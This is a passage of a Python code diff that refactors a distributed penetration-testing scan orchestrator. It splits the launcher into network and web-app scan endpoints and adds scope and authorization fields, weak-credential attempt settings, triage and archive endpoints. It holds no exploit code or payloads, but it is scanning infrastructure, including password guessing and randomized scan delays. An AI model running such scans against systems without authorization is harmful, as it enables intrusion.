self.lst_completed_jobs.remove(job_id) - #end for each job - return + """Finalize completed passes and orchestrate continuous monitoring.""" + return maybe_finalize_pass(self) def _get_all_network_jobs(self): @@ -2156,7 +1560,7 @@ def _get_all_network_jobs(self): dict Raw mapping from job keys to specs. """ - all_workers_and_jobs = self.chainstore_hgetall(hkey=self.cfg_instance_id) + all_workers_and_jobs = PentesterApi01Plugin._get_job_state_repository(self).list_jobs() return all_workers_and_jobs @@ -2202,8 +1606,16 @@ def _get_job_status(self, job_id : str): local_workers = self.scan_jobs.get(job_id) jobs_network_state = self._get_job_from_cstore(job_id) result = {} + reconciled_workers = {} + distributed_incomplete = False + if isinstance(jobs_network_state, dict) and isinstance(jobs_network_state.get("workers"), dict): + reconciled_workers = reconcile_job_workers(self, jobs_network_state) + distributed_incomplete = any( + worker.get("worker_state") not in {"finished", "failed", "unreachable"} + for worker in reconciled_workers.values() + ) # first check if in completed jobs - if job_id in self.lst_completed_jobs: + if job_id in self.lst_completed_jobs and not distributed_incomplete: # dont check in the reports that might contain only from some local workers local_workers_reports = self.completed_jobs_reports[job_id] some_worker = list(local_workers_reports.keys())[0] @@ -2212,7 +1624,8 @@ def _get_job_status(self, job_id : str): "job_id": job_id, "target": target, "status": "completed", - "report": self.completed_jobs_reports[job_id] + "report": self.completed_jobs_reports[job_id], + "workers": reconciled_workers or None, } elif local_workers: @@ -2227,7 +1640,8 @@ def _get_job_status(self, job_id : str): "job_id": job_id, "target": jobs_network_state.get("target"), "status": "network_tracked", - "job": jobs_network_state + "job": jobs_network_state, + "workers": reconciled_workers or None, } # Job not found else: @@ -2250,7 +1664,7 @@ def _get_job_status(self, job_id : str): """ @BasePlugin.endpoint - def list_features(self): + def list_features(self, scan_type: str = ""): """ List available service and web test features. @@ -2259,12 +1673,12 @@ def list_features(self): dict Mapping of categories to lists of feature names. """ - result = {"features": self._get_all_features(categs=True)} + result = {"features": self._get_all_features(categs=True, scan_type=scan_type or None)} return result @BasePlugin.endpoint - def get_feature_catalog(self): + def get_feature_catalog(self, scan_type: str = "all"): """ Return the feature catalog with grouped features, labels, and descriptions. @@ -2276,19 +1690,141 @@ def get_feature_catalog(self): dict Feature catalog with categories and all available methods. """ - all_methods = self._get_all_features() + all_methods = self._get_all_features(scan_type=scan_type) return { - "catalog": FEATURE_CATALOG, + "catalog": self._get_feature_catalog(scan_type=scan_type), "all_methods": all_methods, } + def _validation_error(self, message: str): + """Return a consistent validation error payload.""" + return validation_error(message) + + def _parse_exceptions(self, exceptions): + """Normalize port-exception input to a list of ints.""" + return parse_exceptions(self, exceptions) + + def _resolve_enabled_features(self, excluded_features, scan_type=ScanType.NETWORK.value): + """Validate excluded features and derive enabled features for audit/config.""" + return resolve_enabled_features(self, excluded_features, scan_type=scan_type) + + def _resolve_active_peers(self, selected_peers): + """Validate selected peers against chainstore peers and return active peers.""" + return resolve_active_peers(self, selected_peers) + + def _normalize_common_launch_options( + self, + distribution_strategy, + port_order, + run_mode, + monitor_interval, + scan_min_delay, + scan_max_delay, + nr_local_workers, + ): + """Apply defaults and bounds to common launch settings.""" + return normalize_common_launch_options( + self, + distribution_strategy, + port_order, + run_mode, + monitor_interval, + scan_min_delay, + scan_max_delay, + nr_local_workers, + ) + + def _build_network_workers(self, active_peers, start_port, end_port, distribution_strategy): + """Build peer assignments for network scans.""" + return build_network_workers(self, active_peers, start_port, end_port, distribution_strategy) + + def _build_webapp_workers(self, active_peers, target_port): + """Build peer assignments for webapp scans. Every peer gets the same target.""" + return build_webapp_workers(self, active_peers, target_port) + + def _announce_launch( + self, + *, + target, + start_port, + end_port, + exceptions, + distribution_strategy, + port_order, + excluded_features, + run_mode, + monitor_interval, + scan_min_delay, + scan_max_delay, + task_name, + task_description, + active_peers, + workers, + redact_credentials, + ics_safe_mode, + scanner_identity, + scanner_user_agent, + created_by_name, + created_by_id, + nr_local_workers, + scan_type, + target_url, + official_username, + official_password, + regular_username, + regular_password, + weak_candidates, + max_weak_attempts, + app_routes, + verify_tls, + target_config, + allow_stateful_probes, + ): + """Persist immutable config, announce job in CStore, and return launch response.""" + return announce_launch( + self, + target=target, + start_port=start_port, + end_port=end_port, + exceptions=exceptions, + distribution_strategy=distribution_strategy, + port_order=port_order, + excluded_features=excluded_features, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + task_name=task_name, + task_description=task_description, + active_peers=active_peers, + workers=workers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + created_by_name=created_by_name, + created_by_id=created_by_id, + nr_local_workers=nr_local_workers, + scan_type=scan_type, + target_url=target_url, + official_username=official_username, + official_password=official_password, + regular_username=regular_username, + regular_password=regular_password, + weak_candidates=weak_candidates, + max_weak_attempts=max_weak_attempts, + app_routes=app_routes, + verify_tls=verify_tls, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + ) @BasePlugin.endpoint(method="post") - def launch_test( + def launch_network_scan( self, target: str = "", start_port: int = 1, end_port: int = 65535, - exceptions: str = "64297", #todo format -> list + exceptions: str = "64297", distribution_strategy: str = "", port_order: str = "", excluded_features: list[str] = None, @@ -2307,318 +1843,201 @@ def launch_test( created_by_name: str = "", created_by_id: str = "", nr_local_workers: int = 0, + target_confirmation: str = "", + scope_id: str = "", + authorization_ref: str = "", + engagement_metadata: dict = None, + target_allowlist: list[str] = None, ): - """ - Start a pentest on the specified target. - - Announces the job to the network via CStore; actual execution is handled - asynchronously by worker threads. - - Parameters - ---------- - target : str, optional - Hostname or IP to scan. - start_port : int, optional - Inclusive start port, default 1. - end_port : int, optional - Inclusive end port, default 65535. - exceptions : str, optional - Comma/space separated list of ports to skip. - distribution_strategy: str, optional - "MIRROR" to have all workers scan full range; "SLICE" to split range. - port_order: str, optional - Defines port scanning order at worker-thread level: - "SHUFFLE" to randomize port order; "SEQUENTIAL" for ordered scan. - excluded_features: list[str], optional - List of feature names to exclude from scanning. - run_mode: str, optional - "SINGLEPASS" (default) for one-time scan; "CONTINUOUS_MONITORING" for - repeated scans at monitor_interval. - monitor_interval: int, optional - Seconds between passes in CONTINUOUS_MONITORING mode (0 = use config). - scan_min_delay: float, optional - Minimum random delay between scan operations (Dune sand walking). - scan_max_delay: float, optional - Maximum random delay between scan operations (Dune sand walking). - task_name: str, optional - Human-readable name for the task. - task_description: str, optional - Human-readable description for the task. - selected_peers: list[str], optional - List of peer addresses to run the test on. If not provided or empty, - all configured chainstore_peers will be used. Each address must exist - in the chainstore_peers configuration. - nr_local_workers: int, optional - Number of parallel scan threads each worker node spawns (1-16). - The assigned port range is split evenly across threads. 0 = use config default. - - Returns - ------- - dict - Job specification, current worker id, and other active jobs. - - Raises - ------ - ValueError - If no target is provided or if selected_peers contains invalid addresses. - """ - # INFO: This method only announces the job to the network. It does not - # execute the job itself - that part is handled by PentestJob - # executed after periodical check from plugin process. - if not authorized: - raise ValueError( - "Scan authorization required. Confirm you are authorized to scan this target." - ) - - if excluded_features is None: - excluded_features = self.cfg_excluded_features or [] - if not target: - raise ValueError("No target specified.") - - start_port = int(start_port) - end_port = int(end_port) - - if start_port > end_port: - raise ValueError("start_port must be less than end_port.") - - if len(exceptions) > 0: - exceptions = [ - int(x) for x in self.re.findall(r'\d+', exceptions) - if x.isdigit() - ] - else: - exceptions = [] - - # Validate excluded_features against known features and calculate enabled_features for audit - all_features = self.__features - if excluded_features: - invalid = [f for f in excluded_features if f not in all_features] - if invalid: - self.P(f"Warning: Unknown features in excluded_features (ignored): {self.json_dumps(invalid)}") - excluded_features = [f for f in excluded_features if f in all_features] - enabled_features = [f for f in all_features if f not in excluded_features] - - self.P(f"Excluded features: {self.json_dumps(excluded_features)}") - self.P(f"Enabled features: {self.json_dumps(enabled_features)}") - - distribution_strategy = str(distribution_strategy).upper() - - if not distribution_strategy or distribution_strategy not in [DISTRIBUTION_MIRROR, DISTRIBUTION_SLICE]: - distribution_strategy = self.cfg_distribution_strategy - - port_order = str(port_order).upper() - if not port_order or port_order not in [PORT_ORDER_SHUFFLE, PORT_ORDER_SEQUENTIAL]: - port_order = self.cfg_port_order - - # Validate run_mode and monitor_interval - run_mode = str(run_mode).upper() - if not run_mode or run_mode not in [RUN_MODE_SINGLEPASS, RUN_MODE_CONTINUOUS_MONITORING]: - run_mode = self.cfg_run_mode - if monitor_interval <= 0: - monitor_interval = self.cfg_monitor_interval - - # Validate scan delays (Dune sand walking) - if scan_min_delay <= 0: - scan_min_delay = self.cfg_scan_min_rnd_delay - if scan_max_delay <= 0: - scan_max_delay = self.cfg_scan_max_rnd_delay - # Ensure min <= max - if scan_min_delay > scan_max_delay: - scan_min_delay, scan_max_delay = scan_max_delay, scan_min_delay - - # Validate local workers (parallel scan threads per worker node) - nr_local_workers = int(nr_local_workers) - if nr_local_workers <= 0: - nr_local_workers = self.cfg_nr_local_workers - nr_local_workers = max(LOCAL_WORKERS_MIN, min(LOCAL_WORKERS_MAX, nr_local_workers)) - - # Validate and determine which peers to use - chainstore_peers = self.cfg_chainstore_peers - if not chainstore_peers: - raise ValueError("No workers found in chainstore peers configuration.") - - # Validate selected_peers against chainstore_peers - if selected_peers and len(selected_peers) > 0: - invalid_peers = [p for p in selected_peers if p not in chainstore_peers] - if invalid_peers: - raise ValueError( - f"Invalid peer addresses not found in chainstore_peers: {invalid_peers}. " - f"Available peers: {chainstore_peers}" - ) - active_peers = selected_peers - else: - active_peers = chainstore_peers - - num_workers = len(active_peers) - if num_workers == 0: - raise ValueError("No workers available for job execution.") - - workers = {} - if distribution_strategy == DISTRIBUTION_MIRROR: - for address in active_peers: - workers[address] = { - "start_port": start_port, - "end_port": end_port, - "finished": False, - "result": None - } - # else if selected strategy is SLICE - else: - - total_ports = end_port - start_port + 1 - - base_ports_count = total_ports // num_workers - rem_ports_count = total_ports % num_workers - - current_start = start_port - for i, address in enumerate(active_peers): - if i < rem_ports_count: - size = base_ports_count + 1 - else: - size = base_ports_count - current_end = current_start + size - 1 - - workers[address] = { - "start_port": current_start, - "end_port": current_end, - "finished": False, - "result": None - } - - current_start = current_end + 1 - # end for chainstore_peers - # end if - - # Resolve scanner identity defaults - if not scanner_identity: - scanner_identity = self.cfg_scanner_identity - if not scanner_user_agent: - scanner_user_agent = self.cfg_scanner_user_agent + """Launch a network scan using network-specific validation and worker slicing.""" + return launch_network_scan( + self, + target=target, + start_port=start_port, + end_port=end_port, + exceptions=exceptions, + distribution_strategy=distribution_strategy, + port_order=port_order, + excluded_features=excluded_features, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + task_name=task_name, + task_description=task_description, + selected_peers=selected_peers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + authorized=authorized, + created_by_name=created_by_name, + created_by_id=created_by_id, + nr_local_workers=nr_local_workers, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, + ) - job_id = self.uuid(8) - self.P(f"Launching {job_id=} {target=} with {exceptions=}") - self.P(f"Announcing pentest to workers (instance_id {self.cfg_instance_id})...") + @BasePlugin.endpoint(method="post") + def launch_webapp_scan( + self, + target_url: str = "", + excluded_features: list[str] = None, + run_mode: str = "", + monitor_interval: int = 0, + scan_min_delay: float = 0.0, + scan_max_delay: float = 0.0, + task_name: str = "", + task_description: str = "", + selected_peers: list[str] = None, + redact_credentials: bool = True, + ics_safe_mode: bool = True, + scanner_identity: str = "", + scanner_user_agent: str = "", + authorized: bool = False, + created_by_name: str = "", + created_by_id: str = "", + official_username: str = "", + official_password: str = "", + regular_username: str = "", + regular_password: str = "", + weak_candidates: list[str] = None, + max_weak_attempts: int = 5, + app_routes: list[str] = None, + verify_tls: bool = True, + target_config: dict = None, + allow_stateful_probes: bool = False, + target_confirmation: str = "", + scope_id: str = "", + authorization_ref: str = "", + engagement_metadata: dict = None, + target_allowlist: list[str] = None, + ): + """Launch a graybox webapp scan using webapp-specific validation and mirrored worker assignment.""" + return launch_webapp_scan( + self, + target_url=target_url, + excluded_features=excluded_features, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + task_name=task_name, + task_description=task_description, + selected_peers=selected_peers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + authorized=authorized, + created_by_name=created_by_name, + created_by_id=created_by_id, + official_username=official_username, + official_password=official_password, + regular_username=regular_username, + regular_password=regular_password, + weak_candidates=weak_candidates, + max_weak_attempts=max_weak_attempts, + app_routes=app_routes, + verify_tls=verify_tls, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, + ) - # Build immutable job config and persist to R1FS - job_config = JobConfig( + @BasePlugin.endpoint(method="post") + def launch_test( + self, + target: str = "", + start_port: int = 1, end_port: int = 65535, + exceptions: str = "64297", #todo format -> list + distribution_strategy: str = "", + port_order: str = "", + excluded_features: list[str] = None, + run_mode: str = "", + monitor_interval: int = 0, + scan_min_delay: float = 0.0, + scan_max_delay: float = 0.0, + task_name: str = "", + task_description: str = "", + selected_peers: list[str] = None, + redact_credentials: bool = True, + ics_safe_mode: bool = True, + scanner_identity: str = "", + scanner_user_agent: str = "", + authorized: bool = False, + created_by_name: str = "", + created_by_id: str = "", + nr_local_workers: int = 0, + scan_type: str = "network", + target_url: str = "", + official_username: str = "", + official_password: str = "", + regular_username: str = "", + regular_password: str = "", + weak_candidates: list[str] = None, + max_weak_attempts: int = 5, + app_routes: list[str] = None, + verify_tls: bool = True, + target_config: dict = None, + allow_stateful_probes: bool = False, + target_confirmation: str = "", + scope_id: str = "", + authorization_ref: str = "", + engagement_metadata: dict = None, + target_allowlist: list[str] = None, + ): + """Compatibility shim that routes to scan-type-specific launch endpoints.""" + return launch_test( + self, target=target, start_port=start_port, end_port=end_port, exceptions=exceptions, distribution_strategy=distribution_strategy, port_order=port_order, - nr_local_workers=nr_local_workers, - enabled_features=enabled_features, excluded_features=excluded_features, run_mode=run_mode, + monitor_interval=monitor_interval, scan_min_delay=scan_min_delay, scan_max_delay=scan_max_delay, - ics_safe_mode=ics_safe_mode, + task_name=task_name, + task_description=task_description, + selected_peers=selected_peers, redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, scanner_identity=scanner_identity, scanner_user_agent=scanner_user_agent, - task_name=task_name, - task_description=task_description, - monitor_interval=monitor_interval, - selected_peers=active_peers, - created_by_name=created_by_name or "", - created_by_id=created_by_id or "", - authorized=True, - ) - job_config_cid = self.r1fs.add_json(job_config.to_dict(), show_logs=False) - if not job_config_cid: - self.P("Failed to store job config in R1FS — aborting launch", color='r') - return {"error": "Failed to store job config in R1FS"} - - job_specs = { - "job_id" : job_id, - # Listing fields (duplicated from config for zero-fetch listing) - "target": target, - "task_name": task_name, - "start_port" : start_port, - "end_port" : end_port, - "risk_score": 0, - "date_created": self.time(), - # Orchestration - "launcher": self.ee_addr, - "launcher_alias": self.ee_id, - "timeline": [], - "workers" : workers, - # Job lifecycle: RUNNING | SCHEDULED_FOR_STOP | STOPPED | FINALIZED - "job_status": JOB_STATUS_RUNNING, - # Continuous monitoring fields - "run_mode": run_mode, - "job_pass": 1, - "next_pass_at": None, - "pass_reports": [], - # Config CID (written once at launch) - "job_config_cid": job_config_cid, - } - self._emit_timeline_event( - job_specs, "created", - f"Job created by {created_by_name}", - actor=created_by_name, - actor_type="user" - ) - self._emit_timeline_event(job_specs, "started", "Scan started", actor=self.ee_id, actor_type="node") - - try: - redmesh_job_start_attestation = self._submit_redmesh_job_start_attestation( - job_id=job_id, - job_specs=job_specs, - workers=workers, - ) - if redmesh_job_start_attestation is not None: - job_specs["redmesh_job_start_attestation"] = redmesh_job_start_attestation - self._emit_timeline_event( - job_specs, "blockchain_submit", - "Job-start attestation submitted", - actor_type="system", - meta={**redmesh_job_start_attestation, "network": "base-sepolia"} - ) - except Exception as exc: - import traceback - self.P( - f"[ATTESTATION] Failed to submit job-start attestation for job {job_id}: {exc}\n" - f" Type: {type(exc).__name__}\n" - f" Args: {exc.args}\n" - f" Traceback:\n{traceback.format_exc()}", - color='r' - ) - - self.chainstore_hset( - hkey=self.cfg_instance_id, - key=job_id, - value=job_specs + authorized=authorized, + created_by_name=created_by_name, + created_by_id=created_by_id, + nr_local_workers=nr_local_workers, + scan_type=scan_type, + target_url=target_url, + official_username=official_username, + official_password=official_password, + regular_username=regular_username, + regular_password=regular_password, + weak_candidates=weak_candidates, + max_weak_attempts=max_weak_attempts, + app_routes=app_routes, + verify_tls=verify_tls, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, ) - self._log_audit_event("scan_launched", { - "job_id": job_id, - "target": target, - "start_port": start_port, - "end_port": end_port, - "launcher": self.ee_addr, - "enabled_features_count": len(enabled_features), - "redact_credentials": redact_credentials, - "ics_safe_mode": ics_safe_mode, - }) - - all_network_jobs = self.chainstore_hgetall(hkey=self.cfg_instance_id) - report = {} - for other_key, other_spec in all_network_jobs.items(): - normalized_key, normalized_spec = self._normalize_job_record(other_key, other_spec) - if normalized_key and normalized_key != job_id: - report[normalized_key] = normalized_spec - #end for - - self.P(f"Current jobs:\n{self.json_dumps(all_network_jobs, indent=2)}") - result = { - "job_specs": job_specs, - "worker": self.ee_addr, - "other_jobs": report, - } - return result - @BasePlugin.endpoint def get_job_status(self, job_id: str): @@ -2641,366 +2060,80 @@ def get_job_status(self, job_id: str): @BasePlugin.endpoint def get_job_data(self, job_id: str): - """ - Retrieve job data from CStore. - - For finalized/stopped jobs (stubs): returns the lightweight stub as-is. - The frontend uses job_cid to fetch the full archive via get_job_archive(). - - For running jobs: returns CStore state with pass_reports trimmed to - the last 5 entries (frontend fetches those CIDs individually). - - Parameters - ---------- - job_id : str - Identifier of the job. - - Returns - ------- - dict - Job data or error if not found. - """ - job_specs = self._get_job_from_cstore(job_id) - if not job_specs: - return { - "job_id": job_id, - "found": False, - "message": "Job not found in network store.", - } - - # Finalized stubs have job_cid — return as-is - if job_specs.get("job_cid"): - return { - "job_id": job_id, - "found": True, - "job": job_specs, - } - - # Running jobs — trim pass_reports to last 5 - pass_reports = job_specs.get("pass_reports", []) - if isinstance(pass_reports, list) and len(pass_reports) > 5: - job_specs["pass_reports"] = pass_reports[-5:] - - return { - "job_id": job_id, - "found": True, - "job": job_specs, - } + """Retrieve job data from CStore.""" + return get_job_data(self, job_id) @BasePlugin.endpoint - def get_job_archive(self, job_id: str): - """ - Retrieve the full job archive from R1FS. - - For finalized/stopped jobs only. Returns the complete archive including - job config, all passes, timeline, and ui_aggregate in a single response. - - Parameters - ---------- - job_id : str - Identifier of the job. - - Returns - ------- - dict - Full archive or error. - """ - job_specs = self._get_job_from_cstore(job_id) - if not job_specs: - return {"error": "not_found", "message": f"Job {job_id} not found."} - - job_cid = job_specs.get("job_cid") - if not job_cid: - return {"error": "not_available", "message": f"Job {job_id} is still running (no archive yet)."} - - archive = self.r1fs.get_json(job_cid) - if archive is None: - return {"error": "fetch_failed", "message": f"Failed to fetch archive from R1FS (CID: {job_cid})."} + def get_job_archive( + self, + job_id: str, + summary_only: bool = False, + pass_offset: int = 0, + pass_limit: int = 0, + ): + """Retrieve the full job archive from R1FS.""" + return get_job_archive( + self, + job_id, + summary_only=summary_only, + pass_offset=pass_offset, + pass_limit=pass_limit, + ) - # Integrity check: verify job_id matches - if archive.get("job_id") != job_id: - self.P( - f"[INTEGRITY] Archive CID {job_cid} has job_id={archive.get('job_id')}, expected {job_id}", - color='r' - ) - return {"error": "integrity_mismatch", "message": "Archive job_id does not match requested job_id."} + @BasePlugin.endpoint + def get_job_triage(self, job_id: str, finding_id: str = ""): + """Retrieve mutable analyst triage state for archived findings.""" + return get_job_triage(self, job_id, finding_id) - return {"job_id": job_id, "archive": archive} + @BasePlugin.endpoint + def update_finding_triage( + self, + job_id: str, + finding_id: str, + status: str, + note: str = "", + actor: str = "", + review_at: float = 0, + ): + """Update append-only analyst triage state for one archived finding.""" + return update_finding_triage( + self, + job_id=job_id, + finding_id=finding_id, + status=status, + note=note, + actor=actor, + review_at=review_at, + ) @BasePlugin.endpoint def get_job_progress(self, job_id: str): - """ - Real-time progress for all workers in a job. - - Reads from the `:live` CStore hset and returns only entries - matching the requested job_id. - - Parameters - ---------- - job_id : str - Identifier of the job. - - Returns - ------- - dict - Workers progress keyed by worker address. - """ - live_hkey = f"{self.cfg_instance_id}:live" - all_progress = self.chainstore_hgetall(hkey=live_hkey) or {} - prefix = f"{job_id}:" - result = {} - for key, value in all_progress.items(): - if key.startswith(prefix) and value is not None: - worker_addr = key[len(prefix):] - result[worker_addr] = value - # Include job status so the frontend knows when to reload full data - job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - status = None - if isinstance(job_specs, dict): - status = job_specs.get("status") - return {"job_id": job_id, "status": status, "workers": result} + """Real-time progress for all workers in a job.""" + return get_job_progress(self, job_id) @BasePlugin.endpoint def list_network_jobs(self): - """ - List all network jobs stored in CStore. - - Finalized stubs are returned as-is (already lightweight). - Running jobs are stripped of timeline, workers detail, and pass_reports - to keep the listing payload small. - - Returns - ------- - dict - Normalized job specs keyed by job_id. - """ - raw_network_jobs = self.chainstore_hgetall(hkey=self.cfg_instance_id) - normalized_jobs = {} - for job_key, job_spec in raw_network_jobs.items(): - normalized_key, normalized_spec = self._normalize_job_record(job_key, job_spec) - if normalized_key and normalized_spec: - # Finalized stubs (have job_cid) — already small, return as-is - if normalized_spec.get("job_cid"): - normalized_jobs[normalized_key] = normalized_spec - continue - - # Running jobs — allowlist only listing-essential fields - normalized_jobs[normalized_key] = { - "job_id": normalized_spec.get("job_id"), - "job_status": normalized_spec.get("job_status"), - "target": normalized_spec.get("target"), - "task_name": normalized_spec.get("task_name"), - "risk_score": normalized_spec.get("risk_score", 0), - "run_mode": normalized_spec.get("run_mode"), - "start_port": normalized_spec.get("start_port"), - "end_port": normalized_spec.get("end_port"), - "date_created": normalized_spec.get("date_created"), - "launcher": normalized_spec.get("launcher"), - "launcher_alias": normalized_spec.get("launcher_alias"), - "worker_count": len(normalized_spec.get("workers", {}) or {}), - "pass_count": len(normalized_spec.get("pass_reports", []) or []), - "job_pass": normalized_spec.get("job_pass", 1), - } - return normalized_jobs + """List all network jobs stored in CStore.""" + return list_network_jobs(self) @BasePlugin.endpoint def list_local_jobs(self): - """ - List jobs currently running on this worker. - - Returns - ------- - dict - Mapping job_id to status payload. - """ - jobs = { - job_id: self._get_job_status(job_id) - for job_id, local_workers in self.scan_jobs.items() - } - return jobs + """List jobs currently running on this worker.""" + return list_local_jobs(self) @BasePlugin.endpoint def stop_and_delete_job(self, job_id : str): - """ - Stop a running job, mark it stopped, then delegate to purge_job - for full R1FS + CStore cleanup. - - Parameters - ---------- - job_id : str - Identifier of the job to stop and delete. - - Returns - ------- - dict - Status of the purge operation including CID deletion counts. - """ - # Stop local workers if running - local_workers = self.scan_jobs.get(job_id) - if local_workers: - self.P(f"Stopping and deleting job {job_id}.") - for local_worker_id, job in local_workers.items(): - self.P(f"Stopping job {job_id} on local worker {local_worker_id}.") - job.stop() - self.P(f"Job {job_id} stopped.") - # Remove from active jobs - self.scan_jobs.pop(job_id, None) - - # Mark as stopped in CStore so purge_job accepts it - raw_job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - if isinstance(raw_job_specs, dict): - _, job_specs = self._normalize_job_record(job_id, raw_job_specs) - worker_entry = job_specs.setdefault("workers", {}).setdefault(self.ee_addr, {}) - worker_entry["finished"] = True - worker_entry["canceled"] = True - job_specs["job_status"] = JOB_STATUS_STOPPED - self._emit_timeline_event(job_specs, "stopped", "Job stopped and deleted", actor_type="user") - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) - else: - # Job not found in CStore — nothing to purge - self._log_audit_event("scan_stopped", {"job_id": job_id}) - return {"status": "success", "job_id": job_id, "cids_deleted": 0, "cids_total": 0} - - # Delegate full cleanup to purge_job - self._log_audit_event("scan_stopped", {"job_id": job_id}) - return self.purge_job(job_id) + """Stop a running job, then delegate to purge cleanup.""" + return stop_and_delete_job(self, job_id) @BasePlugin.endpoint def purge_job(self, job_id: str): - """ - Purge a job: delete all R1FS artifacts, clean up live progress keys, - then tombstone the CStore entry. - - Safety invariant: delete ALL R1FS artifacts first, THEN tombstone CStore. - If R1FS deletion fails partway, leave CStore intact so CIDs remain - discoverable for a retry. - - Parameters - ---------- - job_id : str - Identifier of the job to purge. - - Returns - ------- - dict - Status of the purge operation including CID deletion counts. - """ - raw = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - if not isinstance(raw, dict): - return {"status": "error", "message": f"Job {job_id} not found."} - - _, job_specs = self._normalize_job_record(job_id, raw) - - # Reject if job is still running - job_status = job_specs.get("job_status", "") - workers = job_specs.get("workers", {}) - if workers and any(not w.get("finished") for w in workers.values()): - return {"status": "error", "message": "Cannot purge a running job. Stop it first."} - if job_status not in (JOB_STATUS_FINALIZED, JOB_STATUS_STOPPED) and workers: - return {"status": "error", "message": "Cannot purge a running job. Stop it first."} - - # ── Collect all CIDs (deduplicated) ── - cids = set() - - def _track(cid, source): - """Add CID and log where it was found.""" - if cid and isinstance(cid, str) and cid not in cids: - cids.add(cid) - self.P(f"[PURGE] Collected CID {cid} from {source}") - - # Job config CID - _track(job_specs.get("job_config_cid"), "job_specs.job_config_cid") - - # Archive CID (finalized jobs) - job_cid = job_specs.get("job_cid") - if job_cid: - _track(job_cid, "job_specs.job_cid") - # Fetch archive to find nested CIDs - try: - archive = self.r1fs.get_json(job_cid) - if isinstance(archive, dict): - self.P(f"[PURGE] Archive fetched OK, {len(archive.get('passes', []))} passes") - for pi, pass_data in enumerate(archive.get("passes", [])): - _track(pass_data.get("aggregated_report_cid"), f"archive.passes[{pi}].aggregated_report_cid") - for addr, wr in (pass_data.get("worker_reports") or {}).items(): - if isinstance(wr, dict): - _track(wr.get("report_cid"), f"archive.passes[{pi}].worker_reports[{addr}].report_cid") - else: - self.P(f"[PURGE] Archive fetch returned non-dict: {type(archive)}", color='y') - except Exception as e: - self.P(f"[PURGE] Failed to fetch archive {job_cid}: {e}", color='r') - - # Worker report CIDs (running/stopped jobs — finalized stubs have no workers) - for addr, w in workers.items(): - _track(w.get("report_cid"), f"workers[{addr}].report_cid") - - # Pass report CIDs + nested CIDs (running/stopped jobs) - for ri, ref in enumerate(job_specs.get("pass_reports", [])): - report_cid = ref.get("report_cid") - if report_cid: - _track(report_cid, f"pass_reports[{ri}].report_cid") - try: - pass_data = self.r1fs.get_json(report_cid) - if isinstance(pass_data, dict): - _track(pass_data.get("aggregated_report_cid"), f"pass_reports[{ri}]->aggregated_report_cid") - for addr, wr in (pass_data.get("worker_reports") or {}).items(): - if isinstance(wr, dict): - _track(wr.get("report_cid"), f"pass_reports[{ri}]->worker_reports[{addr}].report_cid") - else: - self.P(f"[PURGE] Pass report fetch returned non-dict: {type(pass_data)}", color='y') - except Exception as e: - self.P(f"[PURGE] Failed to fetch pass report {report_cid}: {e}", color='r') - - self.P(f"[PURGE] Total CIDs collected: {len(cids)}: {sorted(cids)}") - - # ── Delete R1FS artifacts ── - deleted, failed = 0, 0 - for cid in cids: - try: - success = self.r1fs.delete_file(cid, show_logs=True, raise_on_error=False) - if success: - deleted += 1 - self.P(f"[PURGE] Deleted CID {cid}") - else: - failed += 1 - self.P(f"[PURGE] delete_file returned False for CID {cid}", color='r') - except Exception as e: - self.P(f"[PURGE] Failed to delete CID {cid}: {e}", color='r') - failed += 1 - - if failed > 0: - # Some CIDs couldn't be deleted — leave CStore intact for retry - self.P(f"Purge incomplete: {failed}/{len(cids)} CIDs failed. CStore kept.", color='r') - return { - "status": "partial", - "job_id": job_id, - "cids_deleted": deleted, - "cids_failed": failed, - "cids_total": len(cids), - "message": "Some R1FS artifacts could not be deleted. Retry purge later.", - } - - # ── Clean up live progress keys ── - all_live = self.chainstore_hgetall(hkey=f"{self.cfg_instance_id}:live") - if isinstance(all_live, dict): - prefix = f"{job_id}:" - for key in all_live: - if key.startswith(prefix): - self.chainstore_hset( - hkey=f"{self.cfg_instance_id}:live", key=key, value=None - ) - - # ── ALL R1FS artifacts deleted — safe to tombstone CStore ── - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=None) - - self.P(f"Purged job {job_id}: {deleted}/{len(cids)} CIDs deleted.") - self._log_audit_event("job_purged", {"job_id": job_id, "cids_deleted": deleted, "cids_total": len(cids)}) - - return {"status": "success", "job_id": job_id, "cids_deleted": deleted, "cids_total": len(cids)} + """Purge a job after it reaches a stoppable terminal state.""" + return purge_job(self, job_id) @BasePlugin.endpoint @@ -3045,74 +2178,16 @@ def get_audit_log(self, limit: int = 100): dict Audit log entries and total count. """ - entries = self._audit_log[-limit:] if limit > 0 else self._audit_log + entries = list(self._audit_log) + if limit > 0: + entries = entries[-limit:] return {"audit_log": entries, "total": len(self._audit_log)} @BasePlugin.endpoint(method="post") def stop_monitoring(self, job_id: str, stop_type: str = "SOFT"): - """ - Stop a job (any run mode with HARD stop, continuous-only for SOFT stop). - - Parameters - ---------- - job_id : str - Identifier of the job to stop. - stop_type : str, optional - "SOFT" (default): Let current pass complete, then stop. - Sets 